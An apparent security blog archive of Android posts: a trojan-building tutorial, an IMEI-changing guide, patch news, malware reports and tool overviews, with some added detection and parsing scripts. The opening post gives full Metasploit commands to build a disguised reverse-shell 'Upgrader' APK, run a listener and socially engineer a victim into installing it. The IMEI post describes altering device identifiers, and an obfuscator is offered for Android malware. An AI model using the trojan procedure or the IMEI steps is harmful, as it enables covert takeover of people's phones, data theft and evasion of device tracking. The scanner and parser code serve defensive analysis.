Showing posts labelled Android.

Hack Any Android Device

Android devices are in use all over the world, and the application ecosystem is what makes the platform attractive to millions of users. That same popularity makes Android a target: attackers exploit it to compromise users and steal personal data.



In this tutorial we are going to learn how to compromise an Android device with Kali Linux and Metasploit. The procedure, step by step:

Step 1:

Open a terminal and build the trojan APK. You can do this by typing:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
Replace LHOST with the address the phone will connect back to: your LAN IP on the local network, or your public IP (with the listener port forwarded to your machine) over the internet. LPORT defaults to 4444. Note that msfpayload was removed from Metasploit in 2015; current installs build the same APK with msfvenom, using the same payload name and the same LHOST and LPORT options.



Step 2:
While the APK is being generated, open another terminal.
Load the Metasploit console by typing: msfconsole




Step 3:
After it loads (this takes a while), select the generic handler by typing: use exploit/multi/handler



Set the matching reverse payload by typing: set payload android/meterpreter/reverse_tcp
Set the listen address by typing: set LHOST 192.168.0.4 (this is the interface the handler binds to, so even for an attack over the WAN use your private/internal IP here, not the public/external one; the public address belongs in the APK's LHOST, and your router forwards the port to this host). The handler's LPORT must match the one built into the APK (4444 by default).



Step 4:

Finally type: exploit to start the listener.
Copy the application you built (/root/Upgrader.apk) to the target Android phone.
Deliver it to the victim and get them to install the Upgrader app (they are meant to think it upgrades some feature of the phone).
When they tap Open, the payload runs, connects back to your handler and you get a Meterpreter session.





The phone must allow installation of apps from Unknown Sources (Settings > Security); if that option is off, the trojan will not install. The whole attack depends on the victim installing and opening the APK you sent: there is no exploit here, only social engineering, and the session you get is the one that connection gives you.
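The flip side of the procedure above is spotting such an APK before anyone opens it. The following is an added example, not code from the original post: a small triage script that looks for the strings the stock Metasploit Android payload template leaves in an APK (the stager package com.metasploit.stage and its Payload and MainActivity classes). The indicator list is an assumption based on the public template, and the sample APK it scans is constructed in memory, not a real app; build_sample_apk is this example's own helper.

```python
import io
import zipfile

# Strings the stock Metasploit Android payload template leaves behind: the stager
# lives in package com.metasploit.stage with classes Payload and MainActivity.
# Indicators assumed from the public template; a repacked or renamed payload will
# not carry them, so a miss means "no evidence", not "clean".
# The APK itself is what `msfvenom -p android/meterpreter/reverse_tcp LHOST=... LPORT=4444 -o out.apk`
# (the successor of the msfpayload command above) produces.
DEX_INDICATORS = [
    b"Lcom/metasploit/stage/Payload;",
    b"Lcom/metasploit/stage/MainActivity;",
]
# The compiled AndroidManifest.xml keeps its string pool as UTF-16LE, so the same
# package name must be searched in that encoding there.
MANIFEST_INDICATORS = ["com.metasploit.stage"]


def scan_apk(apk_bytes):
    """Return a list of (zip member, indicator) hits for Metasploit stager strings."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for name in apk.namelist():
            blob = apk.read(name)
            if name == "AndroidManifest.xml":
                for s in MANIFEST_INDICATORS:
                    if s.encode("utf-16-le") in blob:
                        hits.append((name, s))
            elif name.startswith("classes") and name.endswith(".dex"):
                for needle in DEX_INDICATORS:
                    if needle in blob:  # DEX strings are MUTF-8; ASCII is byte-identical
                        hits.append((name, needle.decode("ascii")))
    return hits


def build_sample_apk(trojan):
    """Construct a toy APK in memory (constructed test data, not a real app)."""
    pkg = "com.metasploit.stage" if trojan else "com.example.notes"
    cls = b"Lcom/metasploit/stage/Payload;" if trojan else b"Lcom/example/notes/Main;"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as apk:
        # minimal stand-ins: a binary-XML-looking prefix plus one UTF-16LE string
        # entry, and the DEX magic followed by a type descriptor
        apk.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + pkg.encode("utf-16-le"))
        apk.writestr("classes.dex", b"dex\n035\x00" + cls)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_apk(True)
    for member, indicator in scan_apk(data):
        print(f"{member}: {indicator}")
```

Run it as `python scan.py Upgrader.apk`; with no argument it scans the constructed sample. String matching is a first pass only: an attacker who renames the stager package or encrypts the DEX defeats it, so treat a hit as confirmation and a miss as nothing more than absence of this one signature.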

That is the whole procedure; it works against any Android device whose user can be talked into installing the APK.


~ Saturday 2 July 2016, 1 comment

Change IMEI - MAUI META 3G

Note:

Please read the post All About IMEI before proceeding. It is important that you know what the database file is, and so on.

Prerequisites:

  • MAUI META 3G (download link below)
  • Database file (read the post above for more)
  • USB cable (a normal phone USB cable)
  • MTK device (a MediaTek MT65xx-series SoC works best; tested on an Android One device and the Yu Yureka)


How to change the IMEI of an Android device.

  1. Download and install the latest version of the MAUI META 3G tool (download link given below)
  2. Launch the application as admin (run as administrator)
  3. Select USB COM (we are using a USB cable, so we need USB COM)
  4. Go to Options
  5. Select "Connect Smart Phone into META mode"
  6. Switch off your phone
  7. Select Reconnect (the circle will blink green and red)
  8. Connect your device while it is switched off (Note: if the phone is not detected automatically within 3 minutes, turn it on with the USB cable plugged in)
  9. The circle turns yellow (this indicates the phone is connected)
  10. Select IMEI Download (change "Get Version" to "IMEI Download")
  11. Select "Upload from flash"
  12. Select the database files (first the APDB file, then the BPLGU file; both are in the stock ROM of your device)
  13. Enter the new IMEI (use an IMEI generator tool to produce one with a valid check digit)
  14. Click Download to flash it
  15. Close the dialog and unplug the USB cable
  16. Turn the phone on
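Step 13 asks for a "valid" IMEI. What the tool checks is structural: an IMEI is 15 decimal digits, the first 14 of which (8-digit TAC plus 6-digit serial) are covered by a Luhn check digit in position 15. The following is an added example, not part of the original post or of the MAUI META tool, showing the check-digit computation and validation; the IMEI it tests against is the well-known documentation example 490154203237518, not a real device.

```python
def luhn_check_digit(body):
    """Luhn check digit for a digit string (for an IMEI, the first 14 digits)."""
    total = 0
    # Walk right to left; the rightmost digit of the body and every second one
    # after it are doubled, and doubled values over 9 have 9 subtracted.
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


def is_valid_imei(imei):
    """15 digits whose last digit is the Luhn check digit of the first 14."""
    return (len(imei) == 15 and imei.isdigit()
            and int(imei[-1]) == luhn_check_digit(imei[:14]))


def make_imei(tac, serial):
    """Assemble TAC (8 digits) + serial (6 digits) + check digit."""
    body = tac + serial
    if len(body) != 14 or not body.isdigit():
        raise ValueError("TAC plus serial must be exactly 14 digits")
    return body + str(luhn_check_digit(body))


if __name__ == "__main__":
    # Example values: the 14-digit body from the documentation example IMEI.
    print(make_imei("49015420", "323751"))
    print(is_valid_imei("490154203237518"), is_valid_imei("490154203237519"))
```

The check digit is all a "generator" adds; the TAC identifies the handset model, so a freshly generated IMEI will still be rejected by some networks if its TAC does not correspond to a real device type.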

Download Links :



Full video tutorial (watch both tutorials before trying it):

Tutorial 1

Tutorial 2 



About the author: Priyank Gada


~ Saturday 11 June 2016, 0 comments

Mobile Security Framework - MobSF

Mobile Security Framework (MobSF) is an all-in-one open source automated pen-testing framework for mobile applications (Android/iOS) that performs both static and dynamic analysis. Assessments have traditionally depended on a chain of separate tools for reversing, decoding, debugging, code review and pen-testing, which costs a lot of effort and time; MobSF is meant to make security analysis of Android and iOS applications fast and effective. It accepts binaries (APK and IPA) and zipped source code.

The static analyzer performs automated code review, flags insecure permissions and configurations, and detects insecure code such as SSL overriding and SSL bypass, weak cryptography, obfuscated code, improper permissions, hardcoded secrets, misuse of dangerous APIs, leakage of sensitive/PII data and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error and crash reports, debug information, stack traces, and on application assets such as settings files, preferences and databases. The framework is extensible, so you can add your own rules easily, and a quick, clean report is generated at the end of the tests. Support for other mobile platforms such as Tizen and Windows Phone is planned.

Download

Installation

Tested on Windows 7, 8, 8.1 and 10, Ubuntu, and OS X Mavericks
  • Windows: Extract the MobSF compressed file to C:\MobSF
  • Mac: Extract MobSF compressed file to /Users/[username]/MobSF
  • Linux: Extract MobSF compressed file to /home/[username]/MobSF

~ Tuesday 16 February 2016, 0 comments

Android Vulnerability Scanner: AndroBugs

AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. It has no fancy GUI, but it is efficient (under 2 minutes per scan on average) and accurate.

Features:

  • Find security vulnerabilities in an Android app
  • Check if the code is missing best practices
  • Check dangerous shell commands (e.g. “su”)
  • Collect Information from millions of apps
  • Check the app's security protection (checks aimed at app repackaging)

Setup Steps and Usage for Windows

Easy to use for Android developers or hackers on Microsoft Windows: (a) no need to install Python 2.7, (b) no third-party libraries to install, (c) no need to install the AndroBugs Framework itself
  1. mkdir C:\AndroBugs_Framework
  2. cd C:\AndroBugs_Framework
  3. Unzip the latest Windows release of AndroBugs Framework into that directory
  4. Go to Computer->System Properties->Advanced->Environment Variables. Add "C:\AndroBugs_Framework" to the "Path" variable
  5. androbugs.exe -h
  6. androbugs.exe -f [APK file]

Usage for Unix/Linux

To run the AndroBugs Framework:

python androbugs.py -f [APK file]

To check the usage:

python androbugs.py -h

Example (reporting across a batch of analysed apps by vulnerability vector, here WEBVIEW_RCE at Critical severity; the second form adds the -a flag):

python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat
python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat -a
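Both MobSF's static analyzer (above) and AndroBugs reduce, at their core, to pattern rules over the app's code with a severity attached. The following is an added example, not code from either project: a rule-based scanner over Java source text whose vector names echo AndroBugs' style (WEBVIEW_RCE) but whose patterns are this example's own, much cruder than the real tools, which work on bytecode rather than text. The Java snippet it scans is constructed for the example and deliberately contains one instance of most rules.

```python
import re

# Rule table: (vector id, severity, pattern, why it matters). Patterns are this
# example's own approximations, not the rule sets of AndroBugs or MobSF.
RULES = [
    ("WEBVIEW_RCE", "Critical", re.compile(r'\baddJavascriptInterface\s*\('),
     "Java object exposed to page JavaScript; remote code execution on WebViews before API 17"),
    ("SSL_TRUST_ALL", "Critical", re.compile(r'checkServerTrusted\s*\([^)]*\)[^{]*\{\s*\}', re.S),
     "empty checkServerTrusted accepts any server certificate"),
    ("SSL_HOSTNAME", "Critical", re.compile(r'ALLOW_ALL_HOSTNAME_VERIFIER'),
     "hostname verification disabled"),
    ("SHELL_SU", "Warning", re.compile(r'\bexec\s*\(\s*"su"'),
     "spawns su: root detection or root abuse"),
    ("WORLD_ACCESS", "Warning", re.compile(r'MODE_WORLD_(READABLE|WRITEABLE)'),
     "file or preferences readable/writable by every app on the device"),
    ("WEAK_CRYPTO", "Warning", re.compile(r'Cipher\.getInstance\s*\(\s*"(AES|DES|AES/ECB[^"]*)"'),
     "ECB mode, explicit or via a bare AES/DES transformation"),
    ("HARDCODED_SECRET", "Warning", re.compile(r'(?i)\b(password|secret|api_?key)\s*=\s*"[^"]{4,}"'),
     "credential literal in code"),
]


def scan_source(text):
    """Run every rule over one source file; return (vector, severity, line, why) sorted by line."""
    findings = []
    for vector, severity, pattern, why in RULES:
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((vector, severity, line_no, why))
    return sorted(findings, key=lambda f: f[2])


# Constructed sample: a deliberately insecure class, one hit per rule except SSL_HOSTNAME.
SAMPLE_JAVA = """public class Net {
    private static final String API_KEY = "sk_live_abcdef123456";
    void setup(WebView w) {
        w.getSettings().setJavaScriptEnabled(true);
        w.addJavascriptInterface(new Bridge(), "android");
    }
    TrustManager tm = new X509TrustManager() {
        public void checkServerTrusted(X509Certificate[] c, String a) throws CertificateException { }
        public void checkClientTrusted(X509Certificate[] c, String a) { }
        public X509Certificate[] getAcceptedIssuers() { return null; }
    };
    void root() throws Exception { Runtime.getRuntime().exec("su"); }
    void store(Context ctx) { ctx.getSharedPreferences("p", Context.MODE_WORLD_READABLE); }
    Cipher c = Cipher.getInstance("AES");
}
"""

if __name__ == "__main__":
    for vector, severity, line_no, why in scan_source(SAMPLE_JAVA):
        print(f"[{severity}] line {line_no}: {vector} - {why}")
```

The point of a severity column is triage: an empty checkServerTrusted or a JavaScript bridge on a pre-API-17 WebView is exploitable by anyone on the network path, whereas a world-readable preferences file needs a second malicious app on the device. Text patterns also produce false positives (a commented-out line still matches), which is exactly why the real tools decompile and walk the bytecode instead.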

Download and read more at

Android Vulnerability Scanner

You can also see the Android application penetration testing course.

~ Thursday 4 February 2016, 0 comments

Android security updates: 7 critical vulnerabilities fixed

Google has released its monthly update for Nexus users, eliminating several severe security vulnerabilities in Android. The update patches bugs that can be exploited through an MMS, an email or a website carrying a specially crafted media file.



The patched flaws affect Android 4.4.4 (KitKat), 5.1 (Lollipop) and 6.0. Two critical remote code execution vulnerabilities in mediaserver could let an attacker cause memory corruption and execute code as the mediaserver process.

Partners were notified of the bugs on January 4 this year. BlackBerry was the only vendor to ship an update for its PRIV handsets within hours of Google's OTA update for Nexus devices; Samsung users will have to wait a week or two before their handsets are updated.

The critical flaws which are fixed in Nexus devices are:


  • Remote Code Execution Vulnerability in Broadcom Wi-Fi Driver
  • Remote Code Execution Vulnerability in Mediaserver
  • Elevation of Privilege Vulnerability in Qualcomm Performance Module
  • Elevation of Privilege Vulnerability in Qualcomm Wi-Fi Driver
  • Elevation of Privilege Vulnerability in the Debugger Daemon 
This is the seventh update Google has released since its monthly security update program began in August last year. Android security researchers have earned around $200,000 since the program launched.

~ Tuesday 2 February 2016, 0 comments

Google fixes four critical vulnerabilities in latest Android update

Google has released its latest Android update for the Nexus family, eliminating around 16 vulnerabilities in Android. The update is part of Google's security policy of releasing a security update every month to make Nexus devices more secure.



Some highly critical vulnerabilities are fixed in this monthly update; one of them could lead to permanent device compromise, which can only be repaired by reflashing the entire OS. Apart from that one, the update eliminates three other critical vulnerabilities, according to the official announcement on Google Groups.

Google started this monthly security patch program back in August and has received warm feedback from Nexus users. This is the fifth security patch, and more than 15 critical vulnerabilities have been fixed in Nexus devices since the start of August.

Here is the list of highly critical vulnerabilities fixed by Google in this latest update:

Remote Code Execution Vulnerability in Mediaserver (CVE-2015-6616)

This vulnerability can allow an attacker to cause memory corruption and remote code execution as the mediaserver process.

Remote Code Execution Vulnerability in Skia (CVE-2015-6617)

A vulnerability in the Skia component may be triggered when processing a specially crafted media file, leading to memory corruption and remote code execution in a privileged process.

Elevation of Privilege in Kernel (CVE-2015-6619)

An elevation of privilege vulnerability in the system kernel could enable a local malicious application to execute arbitrary code in the device's root context.

Remote Code Execution Vulnerabilities in Display Driver (CVE-2015-6633, CVE-2015-6634)

Vulnerabilities in the display drivers that, when processing a media file, could cause memory corruption and potentially arbitrary code execution in the context of the user-mode driver loaded by mediaserver.

The other 10 vulnerabilities are rated High by the security team and two are rated Moderate. The updates are currently only available for Nexus devices; other Android users (Samsung, LG, BlackBerry) will receive them in a few days.

~ Tuesday 8 December 2015, 0 comments

AAMO: Another Android Malware Obfuscator



A set of code-obfuscation scripts tailored for Android applications. It assumes the original application can be disassembled into Smali.

Usage

$ mkdir dir_with_apks_to_obfuscate/     # fill the dir with some APKs
$ vim obfuscators/obfuscators.py

Set the obfuscator_to_apply variable to define the list of obfuscators you want to apply.

For example:

obfuscator_to_apply = [
    'Resigned',
    'Alignment',
    'Rebuild',
    'Fields',
    'Debug',
    'Indirections',
    'Defunct',
    'StringEncrypt',
    'Renaming',
    'Reordering',
    'Goto',
    'ArithmeticBranch',
    'Nop',
    'Asset',
    'Intercept',
    'Raw',
    'Resource',
    'Lib',
    'Restring',
    'Manifest',
    'Reflection']

You can choose a subset of obfuscators (recommended).

$ python obfuscators/obfuscators.py

Enjoy your obfuscated APKs.

Obfuscation Operators

Support:

Android specific

  • Repackaging
  • Reassembly
  • Re-alignment


Simple control-flow modifications

  • Junk code insertion
  • Debug symbols stripping
  • Defunct code insertion
  • Unconditional jump insertion


Advanced control-flow modifications

  • Call indirection
  • Code reordering
  • Reflection
  • Opaque predicate insertion


Renaming

  • Non-code files and resource renaming
  • Fields and methods renaming
  • Package renaming


Encryption

  • Resource encryption (asset files)
  • Native code encryption
  • Data encryption (strings)


~ Friday 13 November 2015, 0 comments

Amazon selling Android tablets with pre-installed Chinese Trojan

Android tablets with a pre-installed Trojan have been sold on Amazon and other online marketplaces. The Trojan silently installs further malware and disables antivirus apps on the device. Dubbed "Cloudsota", it was first discovered by researchers at Cheetah Mobile Security Lab.



According to the Cheetah Mobile researchers, the Trojan was developed by Chinese attackers: the code, the location of the malware server and the manufacturers of the tablets all point that way. The researchers also posted reviews from many customers who bought these cheap Android tablets from marketplaces such as Amazon.

The researchers further found that an attacker can remotely control the infected tablets. Around 17,233 infected tablets are believed to have been delivered, but a larger number has already been shipped by Amazon and other marketplaces.

Infected devices redirect to strange ad pages, remove antivirus apps automatically and change the user's default home page. Because the Trojan runs with root permission, it restores itself after a reboot, so in practice users cannot remove it from their devices.

The United States, Mexico and Turkey are the countries where the tablets were shipped. Unbranded tablets are believed to be the most affected, according to the Cheetah Mobile research team; around 30 brands are also affected, but at a much lower rate.

Amazon and other online marketplaces are still selling the infected tablets, so people should avoid ordering unbranded or very cheap tablets from them for now. Brands believed to carry the Cloudsota Trojan include JYJ 7, JEJA 7 Zoll, FUSION5, Alldaymall Tablet, Yuntab SZ Wave and Tagital.

All of these tablets are made by Chinese manufacturers, who did not even respond when Cheetah Mobile Security Lab suggested they analyse their firmware. This is not the first time an Android device has been sold with a pre-installed Trojan; people in Asia and Africa have been targeted by the same kind of campaign before.


~ Wednesday 11 November 2015, 0 comments

Android fixes critical vulnerabilities with latest Nexus update

Google today released a new update for its Nexus devices which fixes seven severe vulnerabilities, two of them rated "critical".

The update is part of Google's new security policy, announced in August, under which it releases an update every month with the aim of eliminating newly found vulnerabilities in the OS.

The two critical vulnerabilities eliminated in this update are "Remote Code Execution Vulnerabilities in Mediaserver" and "Remote Code Execution Vulnerability in libutils".

Four of the other five vulnerabilities fixed are rated High. Nexus users are understandably pleased with the news.


Critical Vulnerability details: 

Remote Code Execution Vulnerabilities in Mediaserver - (CVE-2015-6608)

This vulnerability was reported by researchers on the Google Chrome security team. Google rated it critical because it allows remote code execution: in other words, malware can be triggered by playing a specially crafted media file on an affected phone or tablet.

The vulnerability sits in a core part of the OS that has permissions third-party apps normally cannot obtain. It is believed that no Android users were attacked through it, since Google's own security researchers found it before any attacker did.


Remote Code Execution Vulnerability in libutils - (CVE-2015-6609) 

This critical vulnerability affects Android 6.0 and below. It was discovered and reported by Copperhead Security researcher Daniel Micay. It is reachable through audio file processing and could let an attacker cause memory corruption and execute code remotely (which could be malware).

The security team rated it critical because of the possibility of remote code execution in a privileged service: the affected component has access to audio and video streams, and to privileges that third-party apps cannot normally obtain.

The other four vulnerabilities are rated High by the Android security team (see the full report), and one is rated Moderate. Ratings are based on the impact a device would suffer if an attacker successfully exploited the flaw.

Nexus users should update their devices without delay now that these vulnerabilities are fixed. Security researchers have applauded Google's policy of releasing monthly updates; it not only makes users feel more secure but may also increase the Nexus market share in the long run.



~ Monday 2 November 2015, 0 comments

LiME Linux Memory Extractor


A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android.

This makes LiME unique: it is the first tool that allows full memory captures on Android devices. It also minimises the interaction between user-space and kernel-space processes during acquisition, which lets it produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Table of Contents

  • Features
  • Usage
  • Examples
  • Presentation

Features

  • Full Android memory acquisition
  • Acquisition over network interface
  • Minimal process footprint


Usage

Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.

LiME utilizes the insmod command to load the module, passing required arguments for its execution.

insmod ./lime.ko "path=<outfile|tcp:<port>> format=<raw|padded|lime> [dio=<0|1>] [localhostonly=<0|1>]"

path (required):            outfile  ~ name of the file to write to on the local system (SD card)
                            tcp:port ~ network port to communicate over

format (required):          raw      ~ concatenates all System RAM ranges
                            padded   ~ pads all non-System RAM ranges with 0s
                            lime     ~ each range prepended with a fixed-size header containing address space info

dio (optional):             1 ~ attempt to enable Direct IO
                            0 ~ default, do not attempt Direct IO

localhostonly (optional):   1 ~ restrict the tcp listener to localhost
                            0 ~ default, bind on all interfaces

Examples

In this example we use adb to load LiME and then start it with acquisition performed over the network

$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"

Now on the host machine, we can establish the connection and acquire memory using netcat

$ nc localhost 4444 > ram.lime

Acquiring to sdcard

# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"
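The lime format is the one worth choosing when the dump will be analysed later, because each range's header records where in physical memory it came from. The following is an added example, not code from the LiME project: a parser for that container (32-byte header per range: magic 0x4C694D45, version 1, inclusive start and end addresses, 8 reserved bytes, little-endian) plus a builder that constructs a tiny sample dump so the parser can be exercised offline. The sample ranges are made up; build_lime and read_physical are this example's own helpers.

```python
import struct

LIME_MAGIC = 0x4C694D45      # "LiME" read as a little-endian 32-bit integer
LIME_VERSION = 1
# Header in front of every range: magic, version, start address, end address
# (inclusive), 8 reserved bytes; 32 bytes in total, little-endian.
HEADER = struct.Struct("<IIQQ8s")


def build_lime(ranges):
    """Construct a lime-format blob from (start_address, bytes) pairs (sample data, not a capture)."""
    out = bytearray()
    for start, data in ranges:
        out += HEADER.pack(LIME_MAGIC, LIME_VERSION, start, start + len(data) - 1, b"\0" * 8)
        out += data
    return bytes(out)


def parse_lime(blob):
    """Walk the headers and return [(start, end, payload)], failing on a bad or truncated range."""
    ranges, off = [], 0
    while off < len(blob):
        if len(blob) - off < HEADER.size:
            raise ValueError(f"truncated header at offset {off:#x}")
        magic, version, start, end, _ = HEADER.unpack_from(blob, off)
        if magic != LIME_MAGIC or version != LIME_VERSION:
            raise ValueError(f"bad LiME header at offset {off:#x}: magic={magic:#x} version={version}")
        size = end - start + 1
        off += HEADER.size
        payload = blob[off:off + size]
        if len(payload) != size:
            raise ValueError(f"range {start:#x}-{end:#x} truncated: {len(payload)} of {size} bytes")
        ranges.append((start, end, payload))
        off += size
    return ranges


def read_physical(ranges, addr, length):
    """Map a physical address to dump bytes; None if it falls in a hole between ranges."""
    for start, end, payload in ranges:
        if start <= addr and addr + length - 1 <= end:
            rel = addr - start
            return payload[rel:rel + length]
    return None


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_lime([(0x1000, b"A" * 16)])
    for start, end, payload in parse_lime(blob):
        print(f"{start:#018x}-{end:#018x}  {len(payload)} bytes")
```

A truncated final range is the usual symptom of a netcat session that was interrupted, which is why the parser refuses it rather than silently returning a short payload; for real captures of several gigabytes, map the file with mmap instead of reading it whole, and record a hash of ram.lime as soon as the transfer finishes.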


Download

~ Wednesday 21 October 2015, 0 comments

How to exploit Vulnerability in Siri and Google Now.

Researchers at ANSSI, the French national information systems security agency, found that attackers can control a smartphone from 16 feet away, and the user would have no idea the phone had been hijacked.

The attack abuses Siri and Google Now through radio signals, without a word being spoken. The attacker can send text messages and emails and browse the internet without ever being granted permission.

How does a hacker control your device? 

The attack only works on devices with microphone-enabled headphones plugged into the jack; that is the only way the attacker gets in without any permission prompt.
The attacker needs a radio transmitter. It sends radio waves that trigger voice commands on Siri or Google Now through the headphones' microphone input.


The headphone cable acts as a radio antenna, so Siri or Google Now receives commands that it believes are coming from the user's microphone. The French researchers presented their discovery at the Hack in Paris conference.


They showed how an attacker can send SMS and emails, open a website the attacker controls, and send phishing and spam messages through the victim's email, Facebook and other social media accounts.

As the generator of electromagnetic waves, the French duo used a laptop running the open-source software GNU Radio, a USRP software-defined radio, an amplifier and an antenna.


The researchers explained that this basic equipment fits inside a backpack and reaches a range of around six and a half feet. In a more powerful configuration with larger batteries, which could fit inside a van, they say the attack's range extends to more than 16 feet.

The two researchers also published a proof-of-concept video in which they send a command to Google Now over radio on an Android smartphone, instructing the device to launch the browser and visit the official ANSSI website.


~ Thursday 15 October 2015, 0 comments

Kemoge Malware: A nightmare for Android users.

Malware named Kemoge, discovered by researchers on Wednesday, is affecting Android users in more than 20 countries. It was found by FireEye researchers, who believe it was written by Chinese developers or is controlled by Chinese attackers. Kemoge can only affect users who install apps from third-party sources on their devices, yet it is still spreading quickly around the world.


Kemoge tricks users through ads into installing an app from a third-party source. The apps are copies of software available on the Google Play Store; the difference is that they attack the user's device after installation.

In a post on the FireEye blog, the researchers wrote: "The attacker uploads the apps to third-party app stores and promotes the download links via websites and in-app ads. Some aggressive ad networks gaining root privilege can also automatically install the samples. On the initial launch, Kemoge collects device information and uploads it to the ad server, then it pervasively serves ads from the background. Victims see ad banners periodically regardless of the current activity (ads even pop up when the user stays on the Android home screen)."

How an Android user can protect against Kemoge

Kemoge is still out there and has affected many Android users, including in the U.S. It may not have reached your country yet, but at the rate it is spreading it can hit your device before you know it. A few security measures that help keep it out:
  • Don't tap links in advertisements, emails, SMS or websites; these are the channels through which Kemoge reaches a device.
  • Avoid installing apps from third-party sources; only trust apps from the Google Play Store.
  • Keep your device up to date. Upgrading to the latest OS version provides some protection, but it does not guarantee you stay protected.



~ Thursday 8 October 2015, 0 comments

Your Android Phone is Vulnerable To Remote Hacking With StageFright Bugs



Stagefright 2.0 is a set of two vulnerabilities that are triggered when processing specially crafted MP3 audio or MP4 video files.

Joshua Drake, Vice President of platform research and exploitation at Zimperium, discovered two more vulnerabilities in Android. His research targets media processing in Android and focuses on remote attacks against current devices.

What is the vulnerability ? 
Processing specially crafted MP3 or MP4 files can lead to arbitrary code execution.

The vulnerability lies in the processing of metadata within the files, so merely previewing the song or video would trigger the issue. Since the primary attack vector of MMS has been removed in newer versions of Google’s Hangouts and Messenger apps, the likely attack vector would be via the Web browser.

  • An attacker would try to convince an unsuspecting user to visit a URL pointing at an attacker controlled Web site (e.g., mobile spear-phishing or malicious ad campaign)
  • An attacker on the same network could inject the exploit using common traffic interception techniques (MITM) to unencrypted network traffic destined for the browser.
  • 3rd party apps (Media Players, Instant Messengers, etc.) that are using the vulnerable library.

Once exploited, the vulnerability gives attackers access to personal data and photos stored on the phone; they can take photos, record conversations, read email and SMS, and install further malicious apps remotely.

Google said the new Stagefright bugs will be fixed in the next scheduled update.

Source: Zimperium

~ Thursday 1 October 2015, 0 comments

Google is Set To Launch its Background Play Service YouTube Red



YouTube has told its partner companies that they must agree to new terms by Oct. 22 or their "videos will no longer be available for public display or monetization in the United States", which supports that launch timeline.

According to a report by Android Police, an update to the YouTube app includes text describing a product called YouTube Red as the service that enables background playback, a feature so far restricted to Music Key (and Music Unlimited) subscribers. The email sent to partners reads:





For years, YouTube’s fans have been telling us they want more — more choice when watching their favorite content, more ways to support their favorite creators and, above all, the option to watch their favorite videos uninterrupted.
To give fans more choice we will be launching a new ads-free version of YouTube, available to fans for a monthly fee. This service will create a new source of revenue over time that supplements your advertising revenue. That’s why an overwhelming majority of our partners — representing over 95% of YouTube watchtime — have asked for and signed up for this service.
As you heard in our previous emails, we want to ensure that fans who choose to pay for an ads-free experience can watch all the same videos that are available on the ads-supported experience. That’s why we’re asking you to update your agreement to reflect the updated terms for the ads-free service.
To accept, simply log into YouTube.com as “pakafka” from a desktop or laptop and follow the prompts by October 22nd.
If you haven’t signed by that date, your videos will no longer be available for public display or monetization in the United States. That outcome would be a loss for YouTube, a loss for the thriving presence you’ve built on the platform, and above all, a loss for your fans. We remain committed to working with you, as we always have. And of course, at any time, you can accept the updated terms which will make your videos public and monetizable again. Common FAQs can be found here.
We believe these new terms will greatly strengthen our partnership for the future. We went through a similar process three years ago when we began distributing and monetizing your content on mobile devices. Today, mobile represents over half of all watchtime and mobile revenue is up 2x in just the last year. Just as with mobile, we’re confident this latest update will excite your fans and generate a previously untapped, additional source of revenue for you. 

If you have questions or encounter technical difficulties, we’re here to help: reach out to us for support here. 

The YouTube Team

Source: Recode , AndroidPolice



~ Friday 25 September 2015, 0 comments

NowSecure Developed Android Vulnerability Test Suite For Recent Devices



Android Vulnerability Test Suite: in the spirit of open data collection, and with the help of the community, let's take the pulse of the state of Android security. NowSecure presents an on-device app that tests for recent device vulnerabilities.

The tool is meant to show the end user the attack surface a given device is exposed to. In implementing these checks we try to minimise or eliminate both false positives and false negatives without affecting system stability.

Rationale for necessity

When a vulnerability is discovered, Google receives word and applies a patch to Android. Nexus devices usually receive these patches quickest, since they deviate the least (read: not at all) from AOSP (the Android Open Source Project, the core of Android that Google commits to). The lag between learning about a bug and a patch reaching a device can still be significant (for OEMs it can be more than a year, or never). For example, the futex bug (CVE-2014-3153, Towelroot) was known in late May or early June 2014 and took months to get patched on the then-flagship Nexus 5. This leaves users exposed to attack from applications. Users mostly do not know their devices are vulnerable, and this tool is meant to give visibility into the vulnerabilities a given device is susceptible to.

Lifecycle of a patch

Samsung, HTC and every other OEM maintain heavily customised versions of Android, and the patch deployment pipeline from OEMs to carriers to users is in disarray. The OEMs receive the patches from Google and spend weeks or months applying them to some devices and testing. They then ship the device updates to the carrier, which is responsible for pushing them to end users, after another QA cycle of its own.

Implementation

Vulnerabilities can exist at many layers of Android: in the kernel (Towelroot, for example) or in the Android-specific framework (Master Key, Fake ID). Some kernel bugs are difficult to check for without risking system instability, so this implementation deliberately omits checks that could destabilise the end user's device. The framework is very thin at present: a vector of vulnerability checks whose concrete implementations vary widely depending on the bug.

Download

~ Sunday 20 September 2015, 0 comments

PATDroid Collection of Tools And Data Structures For Analyzing Android Applications



PATDroid is a collection of tools and data structures for analysing Android applications and the system itself. We intend it as a common base for developing new mobile software debugging, refactoring and reliability/security tools.

We also collect various resources, links, related papers and tips for various innovative Android program analysis tasks.

Packages

